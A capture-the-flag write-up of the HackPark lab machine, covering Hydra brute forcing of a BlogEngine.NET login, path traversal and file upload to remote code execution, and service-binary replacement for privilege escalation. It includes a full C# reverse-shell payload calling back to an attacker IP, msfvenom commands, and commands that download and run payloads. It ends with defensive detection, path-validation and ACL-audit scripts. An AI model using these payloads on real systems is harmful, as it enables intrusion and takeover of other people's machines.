# HackPark

###### tags: `vulnerableMachine`

[TOC]

# Recon

![](https://i.imgur.com/bqQs9xK.png)

![](https://i.imgur.com/dFrRi5i.png)

# Initial Access (Hydra)

GET -> request data
POST -> send data to the server

> What request type is the Windows website login form using?

![](https://i.imgur.com/ClqWhzp.png)

Ans: Post

Request headers captured from the login form:

```
POST /Account/login.aspx?ReturnURL=%2fadmin%2f HTTP/1.1
Host: 10.10.80.169
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 606
Origin: http://10.10.80.169
Connection: close
Referer: http://10.10.80.169/Account/login.aspx?ReturnURL=/admin/
Upgrade-Insecure-Requests: 1
```

Request body, with the username and password fields replaced by Hydra's `^USER^` and `^PASS^` placeholders:

```
__VIEWSTATE=poRNHanBofdZEJXfWH5iZP4zTkj7XJhmuEqa6E2giZykfXp%2FL3hU23Tfj4kWTE8ppNIEhth5%2BxCwgKfUJiQ2%2FePBAR30yZstFi0Ph8vLZ3kStu4xXmAaQahlx%2FrvNbuUa59ion5cB6mHnx5zsIJrDGxLcAiFwMxta90A6nHsRrZBljP2&__EVENTVALIDATION=KQklz%2FU8p3eU9irsMiTantJD%2F84rN%2BNvGwY4XllffH7Il%2Bl%2FemF0CmZk%2FAtqhubSuTmevw2n81iXG2Hq07EOyW4AD33MlP7IrEpWfnnedeLwZgsPGW8yY8OKH16%2F2kXs79GQ%2Bb%2FdgNQPPJtRcNfVb8ahQmW8QvbEjXa43qvaIyCRIFkq&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24RememberMe=on&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in
```

Hydra syntax:

```
hydra -l <username> -P /usr/share/wordlists/<wordlist> <ip> http-post-form
```

- `-l` supplies the value substituted for `^USER^`
- `-P` supplies the wordlist whose entries are substituted for `^PASS^`

The `http-post-form` argument has three colon-separated fields:

```
http-post-form "login form path:request parameters:error message expected when the username or password is not correct"
```

The third field is the string Hydra looks for in the response to recognise a failed attempt; any response that does not contain it is reported as a hit.

---

```
hydra -l admin -P wordlists/rockyou.txt 10.10.80.169 http-post-form "/Account/login.aspx:__VIEWSTATE=poRNHanBofdZEJXfWH5iZP4zTkj7XJhmuEqa6E2giZykfXp%2FL3hU23Tfj4kWTE8ppNIEhth5%2BxCwgKfUJiQ2%2FePBAR30yZstFi0Ph8vLZ3kStu4xXmAaQahlx%2FrvNbuUa59ion5cB6mHnx5zsIJrDGxLcAiFwMxta90A6nHsRrZBljP2&__EVENTVALIDATION=KQklz%2FU8p3eU9irsMiTantJD%2F84rN%2BNvGwY4XllffH7Il%2Bl%2FemF0CmZk%2FAtqhubSuTmevw2n81iXG2Hq07EOyW4AD33MlP7IrEpWfnnedeLwZgsPGW8yY8OKH16%2F2kXs79GQ%2Bb%2FdgNQPPJtRcNfVb8ahQmW8QvbEjXa43qvaIyCRIFkq&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24RememberMe=on&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed"
```

![](https://i.imgur.com/s4mJYKe.png)

# Compromise the machine

> Now you have logged into the website, are you able to identify the version of the BlogEngine?

![](https://i.imgur.com/YBYlRZx.png)

Ans: 3.3.6.0

> Use the [exploit database archive](http://www.exploit-db.com/) to find an exploit to gain a reverse shell on this system. What is the CVE?

![](https://i.imgur.com/0S2yT9t.png)

Path traversal + file upload -> RCE

BlogEngine.NET's `theme` parameter is not properly validated.

### Upload the file

PATH: http://10.10.80.169/admin/app/editor/editpost.cshtml

![](https://i.imgur.com/yboYk4L.png)

> Note that this file must be uploaded as PostView.ascx, and it will be saved to /App_Data/files

### Trigger the payload

http://10.10.10.10/?theme=../../App_Data/files

---

### Script

Upload `vim PostView.ascx`

```
<%@ Control Language="C#" AutoEventWireup="true" EnableViewState="false" Inherits="BlogEngine.Core.Web.Controls.PostViewBase" %>
<%@ Import Namespace="BlogEngine.Core" %>

<script runat="server">
    static System.IO.StreamWriter streamWriter;

    protected override void OnLoad(EventArgs e) {
        base.OnLoad(e);
        // Connect back to the listener on our machine
        using(System.Net.Sockets.TcpClient client = new System.Net.Sockets.TcpClient("10.17.11.72", 443)) {
            using(System.IO.Stream stream = client.GetStream()) {
                using(System.IO.StreamReader rdr = new System.IO.StreamReader(stream)) {
                    streamWriter = new System.IO.StreamWriter(stream);

                    StringBuilder strInput = new StringBuilder();

                    // Spawn cmd.exe with its standard streams redirected so we can drive it over the socket
                    System.Diagnostics.Process p = new System.Diagnostics.Process();
                    p.StartInfo.FileName = "cmd.exe";
                    p.StartInfo.CreateNoWindow = true;
                    p.StartInfo.UseShellExecute = false;
                    p.StartInfo.RedirectStandardOutput = true;
                    p.StartInfo.RedirectStandardInput = true;
                    p.StartInfo.RedirectStandardError = true;
                    p.OutputDataReceived += new System.Diagnostics.DataReceivedEventHandler(CmdOutputDataHandler);
                    p.Start();
                    p.BeginOutputReadLine();

                    // Forward each line received from the socket to cmd.exe's stdin
                    while(true) {
                        strInput.Append(rdr.ReadLine());
                        p.StandardInput.WriteLine(strInput);
                        strInput.Remove(0, strInput.Length);
                    }
                }
            }
        }
    }

    // Send each line of cmd.exe output back over the socket
    private static void CmdOutputDataHandler(object sendingProcess, System.Diagnostics.DataReceivedEventArgs outLine) {
        StringBuilder strOutput = new StringBuilder();

        if (!String.IsNullOrEmpty(outLine.Data)) {
            try {
                strOutput.Append(outLine.Data);
                streamWriter.WriteLine(strOutput);
                streamWriter.Flush();
            } catch (Exception err) { }
        }
    }
</script>

<asp:PlaceHolder ID="phContent" runat="server" EnableViewState="false"></asp:PlaceHolder>
```

---

Establish a TCP connection back to our machine:

```
using(System.Net.Sockets.TcpClient client = new System.Net.Sockets.TcpClient("10.17.11.72", 443)) {
```

Spawn the shell:

```
System.Diagnostics.Process p = new System.Diagnostics.Process();
p.StartInfo.FileName = "cmd.exe";
p.StartInfo.CreateNoWindow = true;
p.StartInfo.UseShellExecute = false;
p.StartInfo.RedirectStandardOutput = true;
p.StartInfo.RedirectStandardInput = true;
p.StartInfo.RedirectStandardError = true;
p.OutputDataReceived += new System.Diagnostics.DataReceivedEventHandler(CmdOutputDataHandler);
p.Start();
p.BeginOutputReadLine();
```

On our machine:

```
nc -lvnp 443
```

![](https://i.imgur.com/ocq8wsf.png)

Initial access:

![](https://i.imgur.com/jilc297.png)

![](https://i.imgur.com/4sCHdS4.png)

# Windows Privilege Escalation

```
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.17.11.72 LPORT=6669 -f exe -o meow.exe
```

```
python3 -m http.server
```

```
powershell -c wget "http://10.17.11.72:8000/meow.exe" -outfile "meow.exe"
```

![](https://i.imgur.com/kxA1mQB.png)

![](https://i.imgur.com/TOij7ag.png)

### System information

> What is the OS version of this windows machine?

![](https://i.imgur.com/zwWLDci.png)

```
wget https://github.com/carlospolop/PEASS-ng/releases/download/20230122/winPEASx86.exe -outfile winPEASx86.exe
```

### Vulnerable service

> What is the name of the abnormal _service_ running?

![](https://i.imgur.com/6Bijwsh.png)

```
WindowsScheduler(Splinterware Software Solutions - System Scheduler Service)[C:\PROGRA~2\SYSTEM~1\WService.exe] - Auto - Running
File Permissions: Everyone [WriteData/CreateFiles]
Possible DLL Hijacking in binary folder: C:\Program Files (x86)\SystemScheduler (Everyone [WriteData/CreateFiles])
System Scheduler Service Wrapper
```

The service binary lives under `C:\Program Files (x86)\`:

```
sc.exe qc WindowsScheduler
```

![](https://i.imgur.com/Vmea5cu.png)

![](https://i.imgur.com/TqJyDID.png)

We can't stop or start the service (QQ), so we have to find another way to trigger our payload.

### Scheduler Event Jobs logs

Event/20198415519.INI_LOG.txt

![](https://i.imgur.com/Hb2HmEk.png)

Content:

![](https://i.imgur.com/230OcDK.png)

> What is the name of the binary you're supposed to exploit?

We can replace Message.exe with our payload.

```
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.17.11.72 LPORT=4444 -f exe -o WService.exe
```

```
mv Message.exe Message.exe.Meow
wget "http://10.17.11.72:8000/WService.exe" -outfile "Message.exe"
```

![](https://i.imgur.com/EXPmo0W.png)

> What is the root flag?

![](https://i.imgur.com/ZgCXb5I.png)
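Looking back at the Initial Access section from the defender's side: the Hydra run above produces a burst of POSTs to `/Account/login.aspx` from one client, which is easy to pick out of IIS W3C logs. The script below is an added Python illustration, not part of the writeup; its log excerpt is constructed to mirror that login form, and the "likely success" heuristic assumes that ASP.NET forms authentication answers a successful POST with a 302 redirect to `ReturnURL` while failures return 200 with the error text.

```python
"""Spot brute forcing of the ASP.NET login form in IIS W3C logs (added illustration)."""
from collections import defaultdict, deque
from datetime import datetime, timedelta

LOGIN_PATH = "/Account/login.aspx"
WINDOW = timedelta(seconds=60)   # sliding window per client IP
THRESHOLD = 5                    # login POSTs within WINDOW before we alert

# Constructed IIS W3C excerpt (IIS writes spaces inside a field as '+').
# Assumption: a 302 on the login POST is the forms-auth redirect to ReturnURL, i.e. a success.
SAMPLE_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query c-ip cs(User-Agent) sc-status
2023-01-22 10:00:00 10.10.80.169 GET /Account/login.aspx ReturnURL=/admin/ 10.17.11.72 Mozilla/5.0 200
2023-01-22 10:00:01 10.10.80.169 POST /Account/login.aspx ReturnURL=%2fadmin%2f 10.17.11.72 Mozilla/5.0 200
2023-01-22 10:00:02 10.10.80.169 POST /Account/login.aspx ReturnURL=%2fadmin%2f 10.17.11.72 Mozilla/5.0 200
2023-01-22 10:00:03 10.10.80.169 POST /Account/login.aspx ReturnURL=%2fadmin%2f 10.17.11.72 Mozilla/5.0 200
2023-01-22 10:00:04 10.10.80.169 POST /Account/login.aspx ReturnURL=%2fadmin%2f 10.17.11.72 Mozilla/5.0 200
2023-01-22 10:00:05 10.10.80.169 POST /Account/login.aspx ReturnURL=%2fadmin%2f 10.17.11.72 Mozilla/5.0 200
2023-01-22 10:00:06 10.10.80.169 POST /Account/login.aspx ReturnURL=%2fadmin%2f 10.17.11.72 Mozilla/5.0 200
2023-01-22 10:00:07 10.10.80.169 POST /Account/login.aspx ReturnURL=%2fadmin%2f 10.17.11.72 Mozilla/5.0 302
2023-01-22 10:00:08 10.10.80.169 GET /admin/ - 10.17.11.72 Mozilla/5.0 200
2023-01-22 10:05:00 10.10.80.169 POST /Account/login.aspx ReturnURL=%2fadmin%2f 10.10.1.5 Mozilla/5.0 200
2023-01-22 10:05:30 10.10.80.169 POST /Account/login.aspx ReturnURL=%2fadmin%2f 10.10.1.5 Mozilla/5.0 302
"""


def parse_w3c(text):
    """Yield one dict per data line, keyed by the names in the #Fields directive."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        if fields is None or len(parts) != len(fields):
            continue  # malformed or truncated line; skip rather than misalign columns
        yield dict(zip(fields, parts))


def detect_bruteforce(text, threshold=THRESHOLD, window=WINDOW):
    """Return alerts for clients that hammer the login form, and for a redirect after such a burst."""
    recent = defaultdict(deque)  # c-ip -> timestamps of recent login POSTs inside the window
    flagged = set()
    alerts = []
    for rec in parse_w3c(text):
        if rec["cs-method"] != "POST" or rec["cs-uri-stem"].lower() != LOGIN_PATH.lower():
            continue
        ts = datetime.strptime(f"{rec['date']} {rec['time']}", "%Y-%m-%d %H:%M:%S")
        ip = rec["c-ip"]
        q = recent[ip]
        q.append(ts)
        while q and ts - q[0] > window:
            q.popleft()
        if len(q) >= threshold and ip not in flagged:
            flagged.add(ip)
            alerts.append({"type": "login_bruteforce", "ip": ip, "attempts": len(q), "at": rec["time"]})
        # A redirect from an already-flagged client means the wordlist most likely found a valid password.
        if ip in flagged and rec["sc-status"] == "302":
            alerts.append({"type": "likely_success_after_bruteforce", "ip": ip, "at": rec["time"]})
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_LOG):
        print(alert)
```

The second client (`10.10.1.5`) makes two attempts and then logs in, which stays below the threshold; only the burst from `10.17.11.72` is reported, first as a brute-force alert on the fifth POST and then as a probable success when the 302 arrives.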
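The root cause in the "Compromise the machine" section is a theme name spliced into a file path without validation, which is why `?theme=../../App_Data/files` makes the application load the uploaded `PostView.ascx`. The following is an added Python illustration of that flaw beside a contained resolver; it is not BlogEngine.NET code. It assumes a layout of `<root>/Custom/Themes/<theme>/PostView.ascx`, chosen so that the writeup's two-level traversal lands on the upload folder, and builds that tree in a temporary directory.

```python
"""Theme-name resolution: the traversal-prone pattern beside a contained one (added illustration)."""
import os
import tempfile


def build_sample_tree():
    """Construct a throwaway web root with one legitimate theme and an 'uploaded' PostView.ascx."""
    root = tempfile.mkdtemp(prefix="theme-demo-")
    for rel in ("Custom/Themes/Standard", "App_Data/files"):
        os.makedirs(os.path.join(root, rel), exist_ok=True)
        with open(os.path.join(root, rel, "PostView.ascx"), "w") as fh:
            fh.write("<%-- placeholder --%>\n")
    return root


def resolve_theme_unsafe(root, theme):
    """The flawed pattern: the request's theme value goes straight into the path."""
    return os.path.normpath(os.path.join(root, "Custom", "Themes", theme, "PostView.ascx"))


def installed_themes(root):
    """Names of the theme directories actually present on disk."""
    themes_dir = os.path.join(root, "Custom", "Themes")
    return {d for d in os.listdir(themes_dir) if os.path.isdir(os.path.join(themes_dir, d))}


def resolve_theme_safe(root, theme):
    """Resolve the path, prove it stays under the themes directory, then allowlist the name."""
    themes_dir = os.path.realpath(os.path.join(root, "Custom", "Themes"))
    candidate = os.path.realpath(os.path.join(themes_dir, theme, "PostView.ascx"))
    # Containment after normalisation: '..' segments, absolute paths and symlinks all collapse
    # here, so anything that ends up outside themes_dir is rejected whatever its spelling.
    if os.path.commonpath([themes_dir, candidate]) != themes_dir:
        raise ValueError(f"theme path escapes {themes_dir}")
    # Defence in depth: the value must also be exactly one installed theme name, which rules out
    # odd-but-contained spellings such as 'Standard/../Standard'.
    if theme not in installed_themes(root):
        raise ValueError(f"unknown theme {theme!r}")
    return candidate


def demo():
    """Run both resolvers against the writeup's payload and report what each did."""
    root = build_sample_tree()
    unsafe = resolve_theme_unsafe(root, "../../App_Data/files")
    results = {
        "unsafe_escaped": os.path.exists(unsafe) and "App_Data" in unsafe,
        "safe_ok": resolve_theme_safe(root, "Standard").endswith("PostView.ascx"),
        "rejected": [],
    }
    for bad in ("../../App_Data/files", "Standard/../Standard", "/etc"):
        try:
            resolve_theme_safe(root, bad)
        except ValueError:
            results["rejected"].append(bad)
    return results


if __name__ == "__main__":
    print(demo())
```

The containment check alone stops the traversal; the allowlist is there so that a future theme directory containing a symlink, or a name that merely wanders inside the themes folder, is still refused.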
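The privilege escalation works because both the service binary and the `Message.exe` that the scheduler launches sit in `C:\Program Files (x86)\SystemScheduler`, a folder `Everyone` can write to. An administrator can hunt for that class of misconfiguration with the check below: an added Python illustration, not winPEAS or anything from the page. Its service, job and ACL records are constructed to mirror this writeup's finding (on a real host they would come from `sc qc`, the scheduler's job definitions and `icacls`), and the 8.3 short-name map is likewise constructed, since a real audit would ask the filesystem to expand `PROGRA~2`.

```python
"""Flag auto-launched executables whose directory is writable by low-privileged principals (added illustration)."""
import ntpath

# Principals and rights that let an unprivileged user drop or overwrite a file in a directory.
LOW_PRIV_PRINCIPALS = {"Everyone", "BUILTIN\\Users", "NT AUTHORITY\\Authenticated Users"}
WRITE_RIGHTS = {"WriteData/CreateFiles", "Write", "Modify", "FullControl"}

# Constructed 8.3 short-name expansion; on a real host this comes from the filesystem.
SHORT_NAMES = {
    "C:\\PROGRA~2\\SYSTEM~1": "C:\\Program Files (x86)\\SystemScheduler",
    "C:\\PROGRA~2": "C:\\Program Files (x86)",
}

# Constructed records: (name, command line as `sc qc` or the job definition shows it).
SERVICES = [
    ("WindowsScheduler", "C:\\PROGRA~2\\SYSTEM~1\\WService.exe"),
    ("Spooler", "C:\\Windows\\System32\\spoolsv.exe"),
    ("ExampleSvc", "\"C:\\Program Files (x86)\\Example Vendor\\svc.exe\" -run"),
]
SCHEDULED_JOBS = [
    ("Message", "C:\\Program Files (x86)\\SystemScheduler\\Message.exe /silent"),
]
# Constructed directory ACLs: directory -> [(principal, right), ...]
DIR_ACLS = {
    "C:\\Program Files (x86)\\SystemScheduler": [
        ("BUILTIN\\Administrators", "FullControl"),
        ("Everyone", "WriteData/CreateFiles"),
    ],
    "C:\\Windows\\System32": [
        ("BUILTIN\\Administrators", "FullControl"),
        ("BUILTIN\\Users", "ReadAndExecute"),
    ],
    "C:\\Program Files (x86)\\Example Vendor": [
        ("BUILTIN\\Administrators", "FullControl"),
        ("BUILTIN\\Users", "ReadAndExecute"),
    ],
}


def executable_from_command(cmd):
    """Extract the executable path from a service or job command line.

    Quoted commands are unambiguous. Unquoted ones containing spaces are cut at the first
    '.exe', which is the binary the audit cares about even though Windows would probe
    shorter prefixes first when it starts the service.
    """
    cmd = cmd.strip()
    if cmd.startswith('"'):
        end = cmd.find('"', 1)
        return cmd[1:end] if end > 0 else cmd[1:]
    idx = cmd.lower().find(".exe")
    if idx >= 0:
        return cmd[: idx + 4]
    return cmd.split()[0]


def expand_short_names(path):
    """Replace an 8.3 prefix using SHORT_NAMES, longest prefix first."""
    for short in sorted(SHORT_NAMES, key=len, reverse=True):
        if path.upper().startswith(short.upper()):
            return SHORT_NAMES[short] + path[len(short):]
    return path


def low_priv_writers(acl):
    """Low-privileged principals in an ACL that hold a write-capable right."""
    return sorted({p for p, right in acl if p in LOW_PRIV_PRINCIPALS and right in WRITE_RIGHTS})


def audit(services, jobs, dir_acls):
    """Return a finding for every auto-launched binary whose directory low-privileged users can write to."""
    findings = []
    for kind, entries in (("service", services), ("scheduled_job", jobs)):
        for name, cmd in entries:
            exe = expand_short_names(executable_from_command(cmd))
            directory = ntpath.dirname(exe)
            acl = next((v for k, v in dir_acls.items() if k.lower() == directory.lower()), [])
            writers = low_priv_writers(acl)
            if writers:
                findings.append({"kind": kind, "name": name, "exe": exe,
                                 "dir": directory, "writable_by": writers})
    return findings


if __name__ == "__main__":
    for f in audit(SERVICES, SCHEDULED_JOBS, DIR_ACLS):
        print(f"[{f['kind']}] {f['name']}: {f['exe']} (directory writable by {', '.join(f['writable_by'])})")
```

Both the service and the scheduled job are reported against the same directory, which is the point: fixing the ACL on `SystemScheduler` (removing the `Everyone` write grant) closes the `Message.exe` replacement as well as any attempt to swap `WService.exe` itself.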